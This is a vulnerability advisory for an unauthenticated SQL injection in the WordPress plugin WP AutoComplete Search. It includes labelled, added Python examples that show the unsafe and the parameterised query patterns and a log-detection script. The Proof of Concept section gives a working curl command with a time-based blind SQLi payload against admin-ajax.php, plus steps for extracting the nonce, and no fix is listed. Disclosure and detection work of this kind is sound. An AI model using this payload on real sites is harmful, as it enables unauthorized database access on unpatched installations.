WordPress Plugin Vulnerabilities

WP AutoComplete Search <= 1.0.4 - Unauthenticated SQLi

Description

The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection.
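The flaw class described above is string-building a query from request input. The following added example (not the plugin's code, and not from the advisory) contrasts that pattern with placeholder binding on a constructed SQLite table; in WordPress the equivalent fix is $wpdb->prepare() with %s placeholders, plus $wpdb->esc_like() for terms used in LIKE clauses. The table, titles and injected term are all constructed for the demonstration.

```python
import sqlite3

# Constructed sample data; stands in for whatever table the plugin searches.
SAMPLE_TITLES = ["Hello world", "Security notes", "Draft: unpublished"]


def make_db():
    """Build an in-memory table with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (title TEXT)")
    conn.executemany("INSERT INTO posts (title) VALUES (?)",
                     [(t,) for t in SAMPLE_TITLES])
    return conn


def search_vulnerable(conn, q):
    """Flawed pattern: the search term is spliced into the SQL text itself."""
    sql = f"SELECT title FROM posts WHERE title LIKE '%{q}%'"
    return [row[0] for row in conn.execute(sql)]


def search_hardened(conn, q):
    """Fixed pattern: the term is bound as a parameter, so it is only ever data."""
    sql = "SELECT title FROM posts WHERE title LIKE ?"
    return [row[0] for row in conn.execute(sql, (f"%{q}%",))]


# Constructed term: a quote closes the literal, an always-true clause follows,
# and a comment discards the remainder of the original statement.
INJECTED_TERM = "zzz%' OR '1'='1' -- "


def demo():
    """Run both variants with a benign term and the injected term."""
    conn = make_db()
    return {
        "benign_vulnerable": search_vulnerable(conn, "Security"),
        "benign_hardened": search_hardened(conn, "Security"),
        # Concatenation: the WHERE clause is rewritten and every row comes back.
        "injected_vulnerable": search_vulnerable(conn, INJECTED_TERM),
        # Binding: the whole term is searched for literally and nothing matches.
        "injected_hardened": search_hardened(conn, INJECTED_TERM),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The benign term returns the same single row either way; only the injected term separates the two, which is why tests that use ordinary input never expose this class of bug.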

Proof of Concept

Extract the nonce from the index page (search for "wp_autosearch_config" and look for the "nonce" field).

Invoke the following curl command, with the nonce in place, to induce a 5 second sleep:

time curl -i 'https://example.com/wp-admin/admin-ajax.php' \
    --data 'action=wi_get_search_results&security=NONCE&q=123" AND (SELECT 1 FROM (SELECT(SLEEP(5)))HIdl)-- CmWf'
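From the defender's side, the request above has two observable traits: a time-delay function inside a form value, and an admin-ajax.php response that takes about as long as the requested sleep. The following added example (not from the advisory or the plugin) checks both over constructed request records; the record tuple shape, the IP addresses and the 4-second threshold are assumptions, and the form body reuses the advisory's own payload.

```python
import re
from urllib.parse import parse_qs, urlencode

# Time-delay functions used in time-based blind SQL injection; finding one in
# a user-supplied form value is a cheap signature check for a WAF or app log.
TIME_DELAY_RE = re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(", re.IGNORECASE)

# Assumed threshold: the PoC induces a 5 second sleep, so admin-ajax.php
# responses at or above this duration deserve a second look.
SLOW_AJAX_SECONDS = 4.0

# Payload exactly as given in the advisory's curl command.
ADVISORY_PAYLOAD = '123" AND (SELECT 1 FROM (SELECT(SLEEP(5)))HIdl)-- CmWf'


def ajax_body(q):
    """Form-encode a search request the way the PoC sends it."""
    return urlencode({"action": "wi_get_search_results",
                      "security": "NONCE", "q": q})


# Constructed request records: (client_ip, path, duration_seconds, form_body)
SAMPLE_REQUESTS = [
    ("203.0.113.5", "/wp-admin/admin-ajax.php", 0.11, ajax_body("hello")),
    ("203.0.113.9", "/wp-admin/admin-ajax.php", 5.21, ajax_body(ADVISORY_PAYLOAD)),
    ("203.0.113.9", "/wp-admin/admin-ajax.php", 5.18, ajax_body(ADVISORY_PAYLOAD)),
    ("198.51.100.7", "/index.php", 0.04, ""),
]


def classify_request(path, duration, body):
    """Return the reasons a single request resembles the advisory's attack."""
    reasons = []
    # parse_qs URL-decodes each value, so the signature sees the real text.
    params = parse_qs(body, keep_blank_values=True)
    for values in params.values():
        if any(TIME_DELAY_RE.search(v) for v in values):
            reasons.append("time-delay-sql-in-form-value")
            break
    if path.endswith("/admin-ajax.php") and duration >= SLOW_AJAX_SECONDS:
        reasons.append("slow-admin-ajax-response")
    return reasons


def find_suspicious(records):
    """Map each client IP to the sorted list of reasons any of its requests fired."""
    hits = {}
    for ip, path, duration, body in records:
        reasons = classify_request(path, duration, body)
        if reasons:
            hits.setdefault(ip, set()).update(reasons)
    return {ip: sorted(r) for ip, r in hits.items()}


if __name__ == "__main__":
    for ip, reasons in find_suspicious(SAMPLE_REQUESTS).items():
        print(ip, reasons)
```

The timing check matters because a request body is not normally written to a web server access log, so the signature is only available where the body is inspected (a WAF, or application-side logging); the duration, by contrast, is cheap to log and catches an obfuscated payload that the regex misses.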

Affects Plugins

No known fix

References

Classification

Type
SQLI
OWASP top 10
CWE
CVSS

Miscellaneous

Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2022-12-12
Added
2022-12-12
Last Updated
2022-12-12
